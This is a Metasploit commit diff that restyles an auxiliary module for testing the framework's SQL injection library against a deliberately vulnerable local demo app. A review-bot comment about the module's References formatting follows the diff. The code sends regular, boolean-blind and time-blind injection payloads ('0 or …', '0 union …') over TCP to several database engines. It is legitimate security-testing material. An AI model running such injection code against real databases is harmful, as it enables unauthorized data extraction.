Fix rubocop issues
parent
f0b1aa44c9
commit
365cebce1a
|
@ -8,17 +8,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
update_info(
|
||||
info,
|
||||
'Name' => 'SQL injection testing module',
|
||||
'Description' => '
|
||||
'Description' => %q{
|
||||
This module tests the SQL injection library against a vulnerable application from https://github.com/red0xff/sqli_vulnerable
|
||||
',
|
||||
'Author' =>
|
||||
[
|
||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||
],
|
||||
},
|
||||
'Author' => [
|
||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w[linux],
|
||||
'References' =>
|
||||
['URL', 'https://github.com/red0xff/sqli_vulnerable'],
|
||||
'References' => ['URL', 'https://github.com/red0xff/sqli_vulnerable'],
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
|
@ -27,12 +25,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
Opt::RHOST('127.0.0.1'),
|
||||
OptInt.new('RPORT', [true, 'The target port', 1337]),
|
||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||
OptEnum.new('SQLI_TYPE', [true, 'The type of SQL injection to test', 'Regular', %w(Regular BooleanBlind TimeBlind)]),
|
||||
OptEnum.new('SQLI_TYPE', [true, 'The type of SQL injection to test', 'Regular', %w[Regular BooleanBlind TimeBlind]]),
|
||||
OptBool.new('SAFE', [false, 'Use safe mode', false]),
|
||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('TRUNCATION_LENGTH', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0]),
|
||||
OptEnum.new('DBMS', [ true, 'The DBMS to target', 'MariaDB', %w(MariaDB PostgreSQL Sqlite MSSQL)])
|
||||
OptEnum.new('DBMS', [ true, 'The DBMS to target', 'MariaDB', %w[MariaDB PostgreSQL Sqlite MSSQL]])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
@ -40,11 +38,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def boolean_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
sock.puts('0 or ' + payload + ' --')
|
||||
res = sock.gets.chomp
|
||||
|
@ -62,13 +60,13 @@ class MetasploitModule < Msf::Auxiliary
|
|||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
truncation_length: truncation,
|
||||
safe: datastore['SAFE'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
truncation_length: truncation,
|
||||
safe: datastore['SAFE'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
sock.puts('0 union ' + payload)
|
||||
res = sock.gets&.chomp
|
||||
|
@ -85,11 +83,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def time_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
|
||||
if datastore['DBMS'] == 'MSSQL'
|
||||
|
@ -126,27 +124,27 @@ class MetasploitModule < Msf::Auxiliary
|
|||
case datastore['SQLI_TYPE']
|
||||
when 'Regular'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::Common
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::Common
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::Common
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::Common
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::Common
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::Common
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::Common
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::Common
|
||||
end
|
||||
reflected
|
||||
when 'BooleanBlind'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::BooleanBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::BooleanBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::BooleanBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::BooleanBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind
|
||||
end
|
||||
boolean_blind
|
||||
when 'TimeBlind'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::TimeBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::TimeBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::TimeBasedBlind
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::TimeBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::TimeBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::TimeBasedBlind
|
||||
end
|
||||
time_blind
|
||||
end
|
||||
end
|
||||
|
|
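Review bot: The collapsed `'References'` entry in the first hunk is still a flat two-element array, whereas Metasploit module metadata conventionally lists references as an array of `[type, value]` pairs, so the framework will likely treat `'URL'` and the address as two separate entries. Since the line is being touched anyway, it should read `'References' => [['URL', 'https://github.com/red0xff/sqli_vulnerable']],`. The same flat shape was present before the reformat, so this is a pre-existing issue that the style pass carries forward rather than introduces. The enclosing `initialize` begins above the hunk, so the rest of the `update_info` call is not visible here.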